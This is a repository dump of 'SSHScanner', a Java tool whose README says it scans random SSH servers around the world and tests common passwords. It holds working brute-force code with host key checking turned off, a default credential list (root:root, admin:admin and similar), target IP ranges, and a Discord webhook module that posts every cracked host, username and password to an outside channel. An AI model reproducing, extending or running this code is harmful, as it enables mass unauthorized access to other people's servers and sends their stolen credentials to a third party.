├── LICENSE ├── README.md ├── combo.txt ├── pom.xml ├── range.txt └── src └── main ├── java └── com │ └── thisisnzed │ └── sshscanner │ ├── SSHScanner.java │ ├── addons │ ├── Addon.java │ └── impl │ │ ├── Combo.java │ │ ├── PortList.java │ │ └── Range.java │ ├── arguments │ ├── ArgumentParser.java │ └── Configuration.java │ ├── launch │ └── Launch.java │ ├── session │ └── Session.java │ └── utils │ ├── DiscordWebhook.java │ └── Logger.java └── resources ├── META-INF └── MANIFEST.MF ├── combo.txt └── range.txt /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. 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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | This tool scans random SSH servers around the world and it tests the most used passwords 3 | 4 | ## Developers 5 | 6 | You can reuse SSHScanner but make sure you comply with the [LICENSE](https://github.com/thisisnzed/SSHScanner/blob/main/LICENSE). 7 | 8 | ### Maven 9 | 10 | ```xml 11 | 12 | 13 | com.thisisnzed 14 | SSHScanner 15 | 1.2.0-SNAPSHOT 16 | 17 | 18 | ``` 19 | 20 | ## Lib 21 | 22 | * **JSch** : http://www.jcraft.com/jsch/ 23 | 24 | ## Usage 25 | 26 | * I. Download the [latest release](https://github.com/thisisnzed/SSHScanner/releases) of SSHScanner 27 | * II. Launch the program 28 | 29 | ## Launch 30 | 31 | *Here are some examples of commands according to your need* 32 | 33 | - **Scan random SSH servers :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose true 34 | - **Scan SSH range :** java -jar SSHScanner.jar -range range.txt -combo combo.txt -threads 3000 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose false 35 | - **Scan specific SSH server :** java -jar SSHScanner.jar -combo combo.txt -threads 1 -port 22 -timeout 6000 -webhook "https://discord.com/api/webhooks/x/y" -verbose true -host "127.0.0.1" 36 | - **Scan ports of specific SSH server (to get SSH port) :** java -jar SSHScanner.jar -combo combo.txt -timeout 1100 -webhook "https://discord.com/api/webhooks/x/y" -verbose true -host "127.0.0.1" -portlist ports.txt 37 | 38 | 39 | ## Arguments 40 | 41 | Note: Each argument is optional 42 | 43 | * **-combo ** | File containing all the "user:password" that the program will test for each host (default: combo.txt) 44 | * **-threads ** | Number of threads launched (default: 1) 45 | * **-port ** | Port that will be tested for each host (default: 22) 46 | * **-timeout ** | Time (in ms) before the program marks a server as unavailable (default: 6000) 47 | * **-webhook ** | Discord webhook where credentials will be sent (default: "") 48 | * **-verbose ** | Whether or not to display failed attempts on the console (default: true) 49 | * **-host ** | **WARNING: Only for bruteforce specific host** | Use this parameter ONLY if you want to perform a bruteforce attack on a specific SSH server - if you use this parameter you only will attack the requested server and not millions of random servers around the world (default: "") 50 | * **-range ** | **WARNING: Only for bruteforce specifics ranges** | Use this parameter ONLY if you want to perform a bruteforce attack on specifics SSH servers (by putting ranges) - if you use this parameter you only will attack the requested ranges and not millions of random servers around the world (default: "") 51 | * **-portlist ** | **WARNING: Only to get SSH port** | Use this parameter ONLY if you want to perform a bruteforce port attack on specific SSH server - if you use this parameter you only will attack the requested server (default: "") 52 | 53 | -------------------------------------------------------------------------------- /combo.txt: -------------------------------------------------------------------------------- 1 | root:pass 2 | root:root 3 | root:admin 4 | root:test 5 | root:123 6 | root:1234 7 | root:12345 8 | root:123456 9 | root:password 10 | root:abc123 11 | root:passwd 12 | root:qwerty 13 | root:azerty 14 | root:test123 15 | root:linux 16 | root:1 17 | root:administrator 18 | root:passw0rd 19 | root:login 20 | root:password1 21 | root:dragon 22 | root:princess 23 | root:welcome 24 | root:iloveyou 25 | root:azertyuiop 26 | root:qwertyuiop 27 | root:football 28 | admin:pass 29 | admin:root 30 | admin:admin 31 | admin:test 32 | admin:123 33 | admin:1234 34 | admin:12345 35 | admin:123456 36 | admin:password 37 | admin:abc123 38 | admin:passwd 39 | admin:qwerty 40 | admin:azerty 41 | admin:test123 42 | admin:linux 43 | admin:1 44 | admin:administrator 45 | admin:passw0rd 46 | admin:login 47 | admin:password1 48 | admin:dragon 49 | admin:princess 50 | admin:welcome 51 | admin:iloveyou 52 | admin:azertyuiop 53 | admin:qwertyuiop 54 | admin:football 55 | oracle:pass 56 | oracle:root 57 | oracle:admin 58 | oracle:test 59 | oracle:123 60 | oracle:1234 61 | oracle:12345 62 | oracle:123456 63 | oracle:password 64 | oracle:abc123 65 | oracle:passwd 66 | oracle:qwerty 67 | oracle:azerty 68 | oracle:test123 69 | oracle:linux 70 | oracle:1 71 | oracle:administrator 72 | oracle:passw0rd 73 | oracle:login 74 | oracle:password1 75 | oracle:dragon 76 | oracle:princess 77 | oracle:welcome 78 | oracle:iloveyou 79 | oracle:azertyuiop 80 | oracle:qwertyuiop 81 | oracle:football 82 | test:pass 83 | test:root 84 | test:admin 85 | test:test 86 | test:123 87 | test:1234 88 | test:12345 89 | test:123456 90 | test:password 91 | test:abc123 92 | test:passwd 93 | test:qwerty 94 | test:azerty 95 | test:test123 96 | test:linux 97 | test:1 98 | test:administrator 99 | test:passw0rd 100 | test:login 101 | test:password1 102 | test:dragon 103 | test:princess 104 | test:welcome 105 | test:iloveyou 106 | test:azertyuiop 107 | test:qwertyuiop 108 | test:football 109 | user:pass 110 | user:root 111 | user:admin 112 | user:test 113 | user:123 114 | user:1234 115 | user:12345 116 | user:123456 117 | user:password 118 | user:abc123 119 | user:passwd 120 | user:qwerty 121 | user:azerty 122 | user:test123 123 | user:linux 124 | user:1 125 | user:administrator 126 | user:passw0rd 127 | user:login 128 | user:password1 129 | user:dragon 130 | user:princess 131 | user:welcome 132 | user:iloveyou 133 | user:azertyuiop 134 | user:qwertyuiop 135 | user:football -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | com.thisisnzed 7 | SSHScanner 8 | 1.2.0-SNAPSHOT 9 | 10 | 8 11 | 8 12 | 13 | 14 | 15 | org.projectlombok 16 | lombok 17 | 1.18.24 18 | provided 19 | 20 | 21 | com.jcraft 22 | jsch 23 | 0.1.55 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /range.txt: -------------------------------------------------------------------------------- 1 | 185.213.45-77.0-255 2 | 3 | 193.26.14.0-255 4 | 5.196.0-255.0-255 5 | 6 | 80.93.0-255.0-255 7 | 213.246.33.0-255 8 | 80.93.80-95.0-255 9 | 185.246.84-87.0-255 10 | 178.170.0-50.0-255 11 | 12 | 103.5.12-15.0-255 13 | 107.189.64-127.0-255 14 | 135.125.0-127.0-255 15 | 135.125.128-255.0-255 16 | 135.148.0-127.0-255 17 | 135.148.128-255.0-255 18 | 137.74.0-255.0-255 19 | 139.99.0-127.0-255 20 | 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-------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/SSHScanner.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner; 2 | 3 | import com.jcraft.jsch.JSch; 4 | import com.thisisnzed.sshscanner.addons.impl.Combo; 5 | import com.thisisnzed.sshscanner.addons.impl.PortList; 6 | import com.thisisnzed.sshscanner.addons.impl.Range; 7 | import com.thisisnzed.sshscanner.arguments.ArgumentParser; 8 | import com.thisisnzed.sshscanner.arguments.Configuration; 9 | import com.thisisnzed.sshscanner.session.Session; 10 | import com.thisisnzed.sshscanner.utils.Logger; 11 | 12 | import java.util.ArrayList; 13 | import java.util.Optional; 14 | import java.util.Random; 15 | import java.util.concurrent.ConcurrentHashMap; 16 | import java.util.concurrent.ConcurrentLinkedQueue; 17 | import java.util.concurrent.atomic.AtomicInteger; 18 | import java.util.stream.IntStream; 19 | 20 | public class SSHScanner { 21 | 22 | private final Configuration configuration; 23 | private final ArgumentParser argumentParser; 24 | private final Session session; 25 | private final Random random; 26 | private final ConcurrentHashMap hosts; 27 | private final Combo combo; 28 | private PortList portList; 29 | private ConcurrentLinkedQueue ipList; 30 | private Range range; 31 | 32 | public SSHScanner(final String[] args) { 33 | this.configuration = new Configuration(); 34 | this.argumentParser = new ArgumentParser(this.configuration, args); 35 | this.configuration.set("combo", ""); 36 | this.configuration.set("range", ""); 37 | this.configuration.set("threads", 1); 38 | this.configuration.set("host", ""); 39 | this.configuration.set("port", 22); 40 | this.configuration.set("portlist", ""); 41 | this.configuration.set("timeout", 6000); 42 | this.configuration.set("webhook", ""); 43 | this.configuration.set("verbose", true); 44 | 45 | this.argumentParser.loadArguments(); 46 | 47 | this.random = new Random(); 48 | this.combo = new Combo(this.configuration, "combo", ':'); 49 | this.hosts = new ConcurrentHashMap<>(); 50 | if (!this.configuration.get("range").equals("")) { 51 | this.ipList = new ConcurrentLinkedQueue<>(); 52 | this.range = new Range(this.configuration, "range", '.'); 53 | this.performAdder(); 54 | } 55 | if (!this.configuration.get("host").equals("") && !this.configuration.get("portlist").equals("")) 56 | this.portList = new PortList(this.configuration, "portlist", ' '); 57 | this.session = new Session(this.combo, this.configuration, new JSch(), new java.util.Properties(), this.portList); 58 | } 59 | 60 | public void start() { 61 | Logger.log("Starting scan..."); 62 | IntStream.range(0, Integer.parseInt(String.valueOf(this.configuration.get("threads")))).forEach(i -> new Thread(() -> { 63 | while (true) { 64 | String host; 65 | if (!this.configuration.get("host").equals("")) host = (String) this.configuration.get("host"); 66 | else if (this.range != null && this.ipList != null) { 67 | final Optional optional = this.ipList.stream().findAny(); 68 | if (optional.isPresent()) { 69 | host = optional.get(); 70 | this.ipList.remove(host); 71 | } else { 72 | Thread.currentThread().interrupt(); 73 | return; 74 | } 75 | } else 76 | host = (this.random.nextInt(254) + 1) + "." + (this.random.nextInt(254) + 1) + "." + (this.random.nextInt(254) + 1) + "." + (this.random.nextInt(254) + 1); 77 | if (!this.hosts.containsKey(host)) 78 | this.combo.getList().stream().filter(combo -> this.hosts.getOrDefault(host, true)).forEach(combo -> this.hosts.put(host, this.session.connect(host, combo.split(":")[0], combo.split(":")[1]))); 79 | } 80 | }).start()); 81 | } 82 | 83 | private void performAdder() { 84 | Logger.log("Loading & preparing all IPs from ranges, please wait..."); 85 | final long start = System.currentTimeMillis(); 86 | this.range.getList().stream().map(ipRange -> ipRange.split("\\.", -1)).forEach(parts -> this.getNumbers(parts[0]).forEach(part0 -> this.getNumbers(parts[1]).forEach(part1 -> this.getNumbers(parts[2]).forEach(part2 -> this.getNumbers(parts[3]).forEach(part3 -> this.ipList.add(part0 + "." + part1 + "." + part2 + "." + part3)))))); 87 | Logger.log(String.format("(ip) Loaded %s IPs! (in %ds)", this.ipList.size(), (System.currentTimeMillis() - start) / 1000)); 88 | } 89 | 90 | private ArrayList getNumbers(final String range) { 91 | final ArrayList numbers = new ArrayList<>(); 92 | if (range.contains("-")) 93 | for (int k = Integer.parseInt(range.substring(0, range.indexOf("-"))); k <= Integer.parseInt(range.substring(range.indexOf("-") + 1)); k++) 94 | numbers.add(Integer.toString(k)); 95 | else 96 | numbers.add(range); 97 | return numbers; 98 | } 99 | } -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/addons/Addon.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.addons; 2 | 3 | import com.thisisnzed.sshscanner.arguments.Configuration; 4 | import com.thisisnzed.sshscanner.utils.Logger; 5 | 6 | import java.io.File; 7 | import java.io.FileOutputStream; 8 | import java.io.IOException; 9 | import java.io.InputStream; 10 | import java.util.ArrayList; 11 | import java.util.Scanner; 12 | 13 | public abstract class Addon { 14 | 15 | private final ArrayList list; 16 | 17 | public Addon(final Configuration configuration, final String addonName, final char needed) { 18 | this.list = new ArrayList<>(); 19 | try { 20 | final File file = configuration.get(addonName).equals("") ? this.getResourceAsFile(addonName + ".txt") : new File((String) configuration.get(addonName)); 21 | if (!file.exists()) file.createNewFile(); 22 | final Scanner scanner = new Scanner(file); 23 | while (scanner.hasNextLine()) { 24 | final String nextLine = scanner.nextLine(); 25 | if (nextLine.contains(String.valueOf(needed)) || needed == ' ') 26 | this.list.add(nextLine); 27 | } 28 | } catch (final Exception exception) { 29 | exception.printStackTrace(); 30 | } 31 | final int size = this.list.size(); 32 | if (size == 0) { 33 | Logger.log(String.format("(%s) The file must have at least one valid line", addonName)); 34 | System.exit(-1); 35 | return; 36 | } 37 | Logger.log(String.format("(%s) Loaded %d lines!", addonName, size)); 38 | } 39 | 40 | private File getResourceAsFile(final String resourcePath) { 41 | try { 42 | InputStream inputStream = ClassLoader.getSystemClassLoader().getResourceAsStream(resourcePath); 43 | if (inputStream == null) 44 | return null; 45 | 46 | File tempFile = File.createTempFile(String.valueOf(inputStream.hashCode()), ".tmp"); 47 | tempFile.deleteOnExit(); 48 | 49 | try (FileOutputStream fileOutputStream = new FileOutputStream(tempFile)) { 50 | byte[] buffer = new byte[1024]; 51 | int bytesRead; 52 | while ((bytesRead = inputStream.read(buffer)) != -1) 53 | fileOutputStream.write(buffer, 0, bytesRead); 54 | } 55 | return tempFile; 56 | } catch (final IOException exception) { 57 | exception.printStackTrace(); 58 | return null; 59 | } 60 | } 61 | 62 | public ArrayList getList() { 63 | return this.list; 64 | } 65 | 66 | } 67 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/addons/impl/Combo.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.addons.impl; 2 | 3 | import com.thisisnzed.sshscanner.addons.Addon; 4 | import com.thisisnzed.sshscanner.arguments.Configuration; 5 | 6 | public class Combo extends Addon { 7 | 8 | public Combo(final Configuration configuration, final String addonName, final char needed) { 9 | super(configuration, addonName, needed); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/addons/impl/PortList.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.addons.impl; 2 | 3 | import com.thisisnzed.sshscanner.addons.Addon; 4 | import com.thisisnzed.sshscanner.arguments.Configuration; 5 | 6 | public class PortList extends Addon { 7 | 8 | public PortList(final Configuration configuration, final String addonName, final char needed) { 9 | super(configuration, addonName, needed); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/addons/impl/Range.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.addons.impl; 2 | 3 | import com.thisisnzed.sshscanner.addons.Addon; 4 | import com.thisisnzed.sshscanner.arguments.Configuration; 5 | 6 | public class Range extends Addon { 7 | 8 | public Range(final Configuration configuration, final String addonName, final char needed) { 9 | super(configuration, addonName, needed); 10 | } 11 | } 12 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/arguments/ArgumentParser.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.arguments; 2 | 3 | import java.util.Arrays; 4 | import java.util.concurrent.atomic.AtomicReference; 5 | 6 | public class ArgumentParser { 7 | 8 | private final Configuration configuration; 9 | private final String[] args; 10 | 11 | public ArgumentParser(final Configuration configuration, final String[] args) { 12 | this.configuration = configuration; 13 | this.args = args; 14 | } 15 | 16 | public void loadArguments() { 17 | final AtomicReference latest = new AtomicReference<>("unknown"); 18 | Arrays.stream(this.args).forEach(argument -> { 19 | if (!latest.get().equals("unknown")) { 20 | this.configuration.set(latest.toString().replaceFirst("-", ""), argument); 21 | latest.set("unknown"); 22 | } else latest.set(argument); 23 | }); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/arguments/Configuration.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.arguments; 2 | 3 | import java.util.concurrent.ConcurrentHashMap; 4 | 5 | public class Configuration { 6 | 7 | private final ConcurrentHashMap args; 8 | 9 | public Configuration() { 10 | this.args = new ConcurrentHashMap<>(); 11 | } 12 | 13 | public void set(final String key, final Object value) { 14 | this.args.put(key, value); 15 | } 16 | 17 | public Object get(final String key) { 18 | return this.args.get(key); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/launch/Launch.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.launch; 2 | 3 | import com.thisisnzed.sshscanner.SSHScanner; 4 | 5 | public class Launch { 6 | 7 | public static void main(final String[] args) { 8 | new SSHScanner(args).start(); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/session/Session.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.session; 2 | 3 | import com.jcraft.jsch.JSch; 4 | import com.thisisnzed.sshscanner.addons.impl.Combo; 5 | import com.thisisnzed.sshscanner.addons.impl.PortList; 6 | import com.thisisnzed.sshscanner.arguments.Configuration; 7 | import com.thisisnzed.sshscanner.utils.DiscordWebhook; 8 | import com.thisisnzed.sshscanner.utils.Logger; 9 | 10 | import java.util.ArrayList; 11 | import java.util.Properties; 12 | 13 | public class Session { 14 | 15 | private final Configuration configuration; 16 | private final JSch jSch; 17 | private final Properties properties; 18 | private final String falsePositive; 19 | private final PortList portList; 20 | 21 | public Session(final Combo combo, final Configuration configuration, final JSch jSch, final Properties properties, final PortList portList) { 22 | final String[] splited = combo.getList().get(0).split(":"); 23 | this.falsePositive = splited[0] + ":" + splited[1]; 24 | this.configuration = configuration; 25 | this.jSch = jSch; 26 | this.properties = properties; 27 | this.properties.put("StrictHostKeyChecking", "no"); 28 | this.portList = portList; 29 | } 30 | 31 | public boolean connect(final String host, final String username, final String password) { 32 | final ArrayList ports = this.portList != null ? this.portList.getList() : new ArrayList<>(); 33 | if (this.portList == null) ports.add(String.valueOf(this.configuration.get("port"))); 34 | boolean success = true; 35 | for (final String p : ports) { 36 | if (success) { 37 | final int port = Integer.parseInt(p); 38 | try { 39 | final com.jcraft.jsch.Session session = this.jSch.getSession(username, host, port); 40 | session.setPassword(password); 41 | session.setConfig(this.properties); 42 | session.setTimeout(Integer.parseInt(String.valueOf(this.configuration.get("timeout")))); 43 | session.connect(); 44 | if (!(username + ":" + password).equals(this.falsePositive)) { 45 | Logger.log(String.format("[%d] %s@%s:%d (password: %s) | Connected", Thread.currentThread().getId(), username, host, port, password)); 46 | if (!this.configuration.get("webhook").equals("")) 47 | new DiscordWebhook((String) this.configuration.get("webhook")).sendWebhook(host, username, password, port); 48 | } 49 | session.disconnect(); 50 | success = false; 51 | } catch (final Exception exception) { 52 | if (Boolean.parseBoolean(String.valueOf(this.configuration.get("verbose")))) 53 | Logger.log(String.format("[%d] %s@%s:%d (password: %s) | %s", Thread.currentThread().getId(), username, host, port, password, exception.getMessage())); 54 | success = !exception.getMessage().toLowerCase().contains("auth fail"); 55 | } 56 | } 57 | } 58 | return success; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/utils/DiscordWebhook.java: -------------------------------------------------------------------------------- 1 | package com.thisisnzed.sshscanner.utils; 2 | 3 | import javax.net.ssl.HttpsURLConnection; 4 | import java.awt.*; 5 | import java.io.IOException; 6 | import java.io.OutputStream; 7 | import java.lang.reflect.Array; 8 | import java.net.URL; 9 | import java.util.List; 10 | import java.util.*; 11 | 12 | /** 13 | * Class used to execute Discord Webhooks with low effort 14 | */ 15 | public class DiscordWebhook { 16 | 17 | private final String url; 18 | private String content; 19 | private String username; 20 | private String avatarUrl; 21 | private boolean tts; 22 | private List embeds = new ArrayList<>(); 23 | 24 | /** 25 | * Constructs a new DiscordWebhook instance 26 | * 27 | * @param url The webhook URL obtained in Discord 28 | */ 29 | public DiscordWebhook(String url) { 30 | this.url = url; 31 | } 32 | 33 | public void setContent(String content) { 34 | this.content = content; 35 | } 36 | 37 | public void setUsername(String username) { 38 | this.username = username; 39 | } 40 | 41 | public void setAvatarUrl(String avatarUrl) { 42 | this.avatarUrl = avatarUrl; 43 | } 44 | 45 | public void setTts(boolean tts) { 46 | this.tts = tts; 47 | } 48 | 49 | public void addEmbed(EmbedObject embed) { 50 | this.embeds.add(embed); 51 | } 52 | 53 | public void execute() throws IOException { 54 | if (this.content == null && this.embeds.isEmpty()) { 55 | throw new IllegalArgumentException("Set content or add at least one EmbedObject"); 56 | } 57 | 58 | JSONObject json = new JSONObject(); 59 | 60 | json.put("content", this.content); 61 | json.put("username", this.username); 62 | json.put("avatar_url", this.avatarUrl); 63 | json.put("tts", this.tts); 64 | 65 | if (!this.embeds.isEmpty()) { 66 | List embedObjects = new ArrayList<>(); 67 | 68 | for (EmbedObject embed : this.embeds) { 69 | JSONObject jsonEmbed = new JSONObject(); 70 | 71 | jsonEmbed.put("title", embed.getTitle()); 72 | jsonEmbed.put("description", embed.getDescription()); 73 | jsonEmbed.put("url", embed.getUrl()); 74 | 75 | if (embed.getColor() != null) { 76 | Color color = embed.getColor(); 77 | int rgb = color.getRed(); 78 | rgb = (rgb << 8) + color.getGreen(); 79 | rgb = (rgb << 8) + color.getBlue(); 80 | 81 | jsonEmbed.put("color", rgb); 82 | } 83 | 84 | EmbedObject.Footer footer = embed.getFooter(); 85 | EmbedObject.Image image = embed.getImage(); 86 | EmbedObject.Thumbnail thumbnail = embed.getThumbnail(); 87 | EmbedObject.Author author = embed.getAuthor(); 88 | List fields = embed.getFields(); 89 | 90 | if (footer != null) { 91 | JSONObject jsonFooter = new JSONObject(); 92 | 93 | jsonFooter.put("text", footer.getText()); 94 | jsonFooter.put("icon_url", footer.getIconUrl()); 95 | jsonEmbed.put("footer", jsonFooter); 96 | } 97 | 98 | if (image != null) { 99 | JSONObject jsonImage = new JSONObject(); 100 | 101 | jsonImage.put("url", image.getUrl()); 102 | jsonEmbed.put("image", jsonImage); 103 | } 104 | 105 | if (thumbnail != null) { 106 | JSONObject jsonThumbnail = new JSONObject(); 107 | 108 | jsonThumbnail.put("url", thumbnail.getUrl()); 109 | jsonEmbed.put("thumbnail", jsonThumbnail); 110 | } 111 | 112 | if (author != null) { 113 | JSONObject jsonAuthor = new JSONObject(); 114 | 115 | jsonAuthor.put("name", author.getName()); 116 | jsonAuthor.put("url", author.getUrl()); 117 | jsonAuthor.put("icon_url", author.getIconUrl()); 118 | jsonEmbed.put("author", jsonAuthor); 119 | } 120 | 121 | List jsonFields = new ArrayList<>(); 122 | for (EmbedObject.Field field : fields) { 123 | JSONObject jsonField = new JSONObject(); 124 | 125 | jsonField.put("name", field.getName()); 126 | jsonField.put("value", field.getValue()); 127 | jsonField.put("inline", field.isInline()); 128 | 129 | jsonFields.add(jsonField); 130 | } 131 | 132 | jsonEmbed.put("fields", jsonFields.toArray()); 133 | embedObjects.add(jsonEmbed); 134 | } 135 | 136 | json.put("embeds", embedObjects.toArray()); 137 | } 138 | 139 | URL url = new URL(this.url); 140 | HttpsURLConnection connection = (HttpsURLConnection) url.openConnection(); 141 | connection.addRequestProperty("Content-Type", "application/json"); 142 | connection.addRequestProperty("User-Agent", "Java-DiscordWebhook-BY-Gelox_"); 143 | connection.setDoOutput(true); 144 | connection.setRequestMethod("POST"); 145 | 146 | OutputStream stream = connection.getOutputStream(); 147 | stream.write(json.toString().getBytes()); 148 | stream.flush(); 149 | stream.close(); 150 | 151 | connection.getInputStream().close(); //I'm not sure why but it doesn't work without getting the InputStream 152 | connection.disconnect(); 153 | } 154 | 155 | public static class EmbedObject { 156 | private String title; 157 | private String description; 158 | private String url; 159 | private Color color; 160 | 161 | private Footer footer; 162 | private Thumbnail thumbnail; 163 | private Image image; 164 | private Author author; 165 | private List fields = new ArrayList<>(); 166 | 167 | public String getTitle() { 168 | return title; 169 | } 170 | 171 | public String getDescription() { 172 | return description; 173 | } 174 | 175 | public String getUrl() { 176 | return url; 177 | } 178 | 179 | public Color getColor() { 180 | return color; 181 | } 182 | 183 | public Footer getFooter() { 184 | return footer; 185 | } 186 | 187 | public Thumbnail getThumbnail() { 188 | return thumbnail; 189 | } 190 | 191 | public Image getImage() { 192 | return image; 193 | } 194 | 195 | public Author getAuthor() { 196 | return author; 197 | } 198 | 199 | public List getFields() { 200 | return fields; 201 | } 202 | 203 | public EmbedObject setTitle(String title) { 204 | this.title = title; 205 | return this; 206 | } 207 | 208 | public EmbedObject setDescription(String description) { 209 | this.description = description; 210 | return this; 211 | } 212 | 213 | public EmbedObject setUrl(String url) { 214 | this.url = url; 215 | return this; 216 | } 217 | 218 | public EmbedObject setColor(Color color) { 219 | this.color = color; 220 | return this; 221 | } 222 | 223 | public EmbedObject setFooter(String text, String icon) { 224 | this.footer = new Footer(text, icon); 225 | return this; 226 | } 227 | 228 | public EmbedObject setThumbnail(String url) { 229 | this.thumbnail = new Thumbnail(url); 230 | return this; 231 | } 232 | 233 | public EmbedObject setImage(String url) { 234 | this.image = new Image(url); 235 | return this; 236 | } 237 | 238 | public EmbedObject setAuthor(String name, String url, String icon) { 239 | this.author = new Author(name, url, icon); 240 | return this; 241 | } 242 | 243 | public EmbedObject addField(String name, String value, boolean inline) { 244 | this.fields.add(new Field(name, value, inline)); 245 | return this; 246 | } 247 | 248 | private class Footer { 249 | private String text; 250 | private String iconUrl; 251 | 252 | private Footer(String text, String iconUrl) { 253 | this.text = text; 254 | this.iconUrl = iconUrl; 255 | } 256 | 257 | private String getText() { 258 | return text; 259 | } 260 | 261 | private String getIconUrl() { 262 | return iconUrl; 263 | } 264 | } 265 | 266 | private class Thumbnail { 267 | private String url; 268 | 269 | private Thumbnail(String url) { 270 | this.url = url; 271 | } 272 | 273 | private String getUrl() { 274 | return url; 275 | } 276 | } 277 | 278 | private class Image { 279 | private String url; 280 | 281 | private Image(String url) { 282 | this.url = url; 283 | } 284 | 285 | private String getUrl() { 286 | return url; 287 | } 288 | } 289 | 290 | private class Author { 291 | private String name; 292 | private String url; 293 | private String iconUrl; 294 | 295 | private Author(String name, String url, String iconUrl) { 296 | this.name = name; 297 | this.url = url; 298 | this.iconUrl = iconUrl; 299 | } 300 | 301 | private String getName() { 302 | return name; 303 | } 304 | 305 | private String getUrl() { 306 | return url; 307 | } 308 | 309 | private String getIconUrl() { 310 | return iconUrl; 311 | } 312 | } 313 | 314 | private class Field { 315 | private String name; 316 | private String value; 317 | private boolean inline; 318 | 319 | private Field(String name, String value, boolean inline) { 320 | this.name = name; 321 | this.value = value; 322 | this.inline = inline; 323 | } 324 | 325 | private String getName() { 326 | return name; 327 | } 328 | 329 | private String getValue() { 330 | return value; 331 | } 332 | 333 | private boolean isInline() { 334 | return inline; 335 | } 336 | } 337 | } 338 | 339 | private class JSONObject { 340 | 341 | private final HashMap map = new HashMap<>(); 342 | 343 | void put(String key, Object value) { 344 | if (value != null) { 345 | map.put(key, value); 346 | } 347 | } 348 | 349 | @Override 350 | public String toString() { 351 | StringBuilder builder = new StringBuilder(); 352 | Set> entrySet = map.entrySet(); 353 | builder.append("{"); 354 | 355 | int i = 0; 356 | for (Map.Entry entry : entrySet) { 357 | Object val = entry.getValue(); 358 | builder.append(quote(entry.getKey())).append(":"); 359 | 360 | if (val instanceof String) { 361 | builder.append(quote(String.valueOf(val))); 362 | } else if (val instanceof Integer) { 363 | builder.append(Integer.valueOf(String.valueOf(val))); 364 | } else if (val instanceof Boolean) { 365 | builder.append(val); 366 | } else if (val instanceof JSONObject) { 367 | builder.append(val.toString()); 368 | } else if (val.getClass().isArray()) { 369 | builder.append("["); 370 | int len = Array.getLength(val); 371 | for (int j = 0; j < len; j++) { 372 | builder.append(Array.get(val, j).toString()).append(j != len - 1 ? "," : ""); 373 | } 374 | builder.append("]"); 375 | } 376 | 377 | builder.append(++i == entrySet.size() ? "}" : ","); 378 | } 379 | 380 | return builder.toString(); 381 | } 382 | 383 | private String quote(String string) { 384 | return "\"" + string + "\""; 385 | } 386 | } 387 | 388 | public void sendWebhook(final String host, final String username, final String password, final int port) { 389 | if (this.url == null || this.url.equals("")) return; 390 | this.setContent("@everyone"); 391 | this.addEmbed(new DiscordWebhook.EmbedObject().setTitle("**New SSH server access found (" + System.getProperty("user.name") + ")**").addField("**IP Address**", host, false).addField("**User**", username, false).addField("**Password**", password, false).addField("**Port**", String.valueOf(port), false).setColor(Color.GREEN)); 392 | try { 393 | this.execute(); 394 | } catch (final IOException exception) { 395 | exception.printStackTrace(); 396 | } 397 | } 398 | 399 | } -------------------------------------------------------------------------------- /src/main/java/com/thisisnzed/sshscanner/utils/Logger.java: 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